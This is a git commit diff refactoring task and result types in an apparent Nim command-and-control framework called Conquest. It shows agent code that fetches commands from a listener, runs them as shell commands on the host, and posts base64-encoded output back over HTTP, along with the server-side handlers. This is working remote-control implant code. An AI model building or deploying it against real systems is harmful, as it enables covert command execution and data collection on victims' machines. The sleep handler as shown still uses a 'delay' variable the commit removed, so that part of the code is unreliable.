Seperated Task and TaskResult types.

This commit is contained in:
Jakob Friedl
2025-05-29 15:26:50 +02:00
parent 118e9eadd2
commit 3849bcd7f1
11 changed files with 59 additions and 75 deletions

View File

@@ -60,7 +60,7 @@ proc main() =
# Execute all retrieved tasks and return their output to the server # Execute all retrieved tasks and return their output to the server
for task in tasks: for task in tasks:
let result = task.handleTask(config) let result: TaskResult = task.handleTask(config)
discard config.postResults(agent, result) discard config.postResults(agent, result)
when isMainModule: when isMainModule:

View File

@@ -1,14 +1,24 @@
import winim, osproc, strutils, strformat import winim, osproc, strutils, strformat, base64
import ../types import ../types
proc taskShell*(command: seq[string]): tuple[output: TaskResult, status: TaskStatus] = proc taskShell*(task: Task): TaskResult =
echo "Executing command: ", command.join(" ") echo "Executing command: ", task.args.join(" ")
try: try:
let (output, status) = execCmdEx(command.join(" ")) let (output, status) = execCmdEx(task.args.join(" "))
return (output, Completed) return TaskResult(
task: task.id,
agent: task.agent,
data: encode(output),
status: Completed
)
except CatchableError as err: except CatchableError as err:
return (fmt"An error occured: {err.msg}" & "\n", Failed) return TaskResult(
task: task.id,
agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed
)

View File

@@ -1,14 +1,24 @@
import os, strutils, strformat import os, strutils, strformat, base64
import ../types import ../types
proc taskSleep*(delay: int): tuple[output: TaskResult, status: TaskStatus] = proc taskSleep*(task: Task): TaskResult =
echo fmt"Sleeping for {$delay} seconds." echo fmt"Sleeping for {task.args[0]} seconds."
try: try:
sleep(delay * 1000) sleep(parseInt(task.args[0]) * 1000)
return ("", Completed) return TaskResult(
task: task.id,
agent: task.agent,
data: encode(""),
status: Completed
)
except CatchableError as err: except CatchableError as err:
return (fmt"An error occured: {err.msg}" & "\n", Failed) return TaskResult(
task: task.id,
agent: task.agent,
data: encode(fmt"An error occured: {err.msg}" & "\n"),
status: Failed
)

View File

@@ -49,20 +49,20 @@ proc getTasks*(config: AgentConfig, agent: string): seq[Task] =
return @[] return @[]
proc postResults*(config: AgentConfig, agent: string, task: Task): bool = proc postResults*(config: AgentConfig, agent: string, taskResult: TaskResult): bool =
let client = newAsyncHttpClient() let client = newAsyncHttpClient()
# Define headers # Define headers
client.headers = newHttpHeaders({ "Content-Type": "application/json" }) client.headers = newHttpHeaders({ "Content-Type": "application/json" })
let taskJson = %task let taskJson = %taskResult
echo $taskJson echo $taskJson
try: try:
# Register agent to the Conquest server # Register agent to the Conquest server
discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/{task.id}/results", $taskJson) discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/{config.listener}/{agent}/{taskResult.task}/results", $taskJson)
except CatchableError as err: except CatchableError as err:
# When the listener is not reachable, don't kill the application, but check in at the next time # When the listener is not reachable, don't kill the application, but check in at the next time
echo "[-] [postResults]: ", err.msg echo "[-] [postResults]: ", err.msg

View File

@@ -2,4 +2,4 @@
-d:ListenerUuid="KPDHWZNT" -d:ListenerUuid="KPDHWZNT"
-d:ListenerIp="localhost" -d:ListenerIp="localhost"
-d:ListenerPort=7777 -d:ListenerPort=7777
-d:SleepDelay=0 -d:SleepDelay=10

View File

@@ -1,49 +1,28 @@
import base64, strutils import strutils
import ./types import ./types
import ./commands/commands import ./commands/commands
proc handleTask*(task: Task, config: AgentConfig): Task = proc handleTask*(task: Task, config: AgentConfig): TaskResult =
# Handle task command # Handle task command
case task.command: case task.command:
of ExecuteShell: of ExecuteShell:
let taskResult = taskShell(task)
let (output, status) = taskShell(task.args) echo taskResult.data
echo output return taskResult
return Task( of Sleep:
id: task.id,
agent: task.agent,
command: task.command,
args: task.args,
result: encode(output), # Base64 encode result
status: status
)
of Sleep:
# Parse arguments
let delay: int = parseInt(task.args[0])
# Execute task # Execute task
let (output, status) = taskSleep(delay) let taskResult = taskSleep(task)
# Update sleep delay in agent config # Update sleep delay in agent config
if status == Completed: if taskResult.status == Completed:
config.sleep = delay config.sleep = delay
# Return result # Return result
return Task( return taskResult
id: task.id,
agent: task.agent,
command: task.command,
args: task.args,
result: encode(output),
status: status
)
else: else:
echo "Not implemented" echo "Not implemented"
return nil return nil
return task

View File

@@ -208,19 +208,19 @@ proc getTasks*(listener, agent: string): JsonNode =
# return nil # return nil
# Return tasks in JSON format # Return tasks in JSON format
return %cq.agents[agent.toUpperAscii].tasks.filterIt(it.status != Completed) return %cq.agents[agent.toUpperAscii].tasks
proc handleResult*(listener, agent, task: string, taskResult: Task) = proc handleResult*(listener, agent, task: string, taskResult: TaskResult) =
{.cast(gcsafe).}: {.cast(gcsafe).}:
cq.writeLine(fgBlack, styleBright, fmt"[*] [{task}] ", resetStyle, "Task execution finished.") cq.writeLine(fgBlack, styleBright, fmt"[*] [{task}] ", resetStyle, "Task execution finished.")
if taskResult.result != "": if taskResult.data != "":
cq.writeLine(fgBlack, styleBright, fmt"[*] [{task}] ", resetStyle, "Output:") cq.writeLine(fgBlack, styleBright, fmt"[*] [{task}] ", resetStyle, "Output:")
# Split result string on newline to keep formatting # Split result string on newline to keep formatting
for line in decode(taskResult.result).split("\n"): for line in decode(taskResult.data).split("\n"):
cq.writeLine(line) cq.writeLine(line)
# Update task queue to include all tasks, except the one that was just completed # Update task queue to include all tasks, except the one that was just completed

View File

@@ -11,8 +11,6 @@ proc taskExecuteShell*(cq: Conquest, arguments: seq[string]) =
agent: cq.interactAgent.name, agent: cq.interactAgent.name,
command: ExecuteShell, command: ExecuteShell,
args: arguments, args: arguments,
result: "",
status: Created
) )
# Add new task to the agent's task queue # Add new task to the agent's task queue

View File

@@ -20,8 +20,6 @@ proc taskExecuteSleep*(cq: Conquest, delay: int) =
agent: cq.interactAgent.name, agent: cq.interactAgent.name,
command: Sleep, command: Sleep,
args: @[$delay], args: @[$delay],
result: "",
status: Created
) )
# Add new task to the agent's task queue # Add new task to the agent's task queue

View File

@@ -101,7 +101,7 @@ proc postResults*(ctx: Context) {.async.} =
try: try:
let let
taskResultJson: JsonNode = parseJson(ctx.request.body) taskResultJson: JsonNode = parseJson(ctx.request.body)
taskResult: Task = taskResultJson.to(Task) taskResult: TaskResult = taskResultJson.to(TaskResult)
# Handle and display task result # Handle and display task result
handleResult(listener, agent, task, taskResult) handleResult(listener, agent, task, taskResult)

View File

@@ -17,34 +17,23 @@ type
Sleep = "sleep" Sleep = "sleep"
TaskStatus* = enum TaskStatus* = enum
Created = "created"
Completed = "completed" Completed = "completed"
Created = "created"
Pending = "pending" Pending = "pending"
Failed = "failed" Failed = "failed"
Cancelled = "cancelled" Cancelled = "cancelled"
TaskResult* = string TaskResult* = ref object
task*: string
#[ agent*: string
TaskResult*[T] = ref object data*: string
data*: T status*: TaskStatus
Task*[T] = ref object
id*: string
agent*: string
command*: TaskCommand
args*: seq[string]
result*: TaskResult[T]
status*: TaskStatus
]#
Task* = ref object Task* = ref object
id*: string id*: string
agent*: string agent*: string
command*: TaskCommand command*: TaskCommand
args*: seq[string] args*: seq[string]
result*: TaskResult
status*: TaskStatus
AgentRegistrationData* = object AgentRegistrationData* = object
username*: string username*: string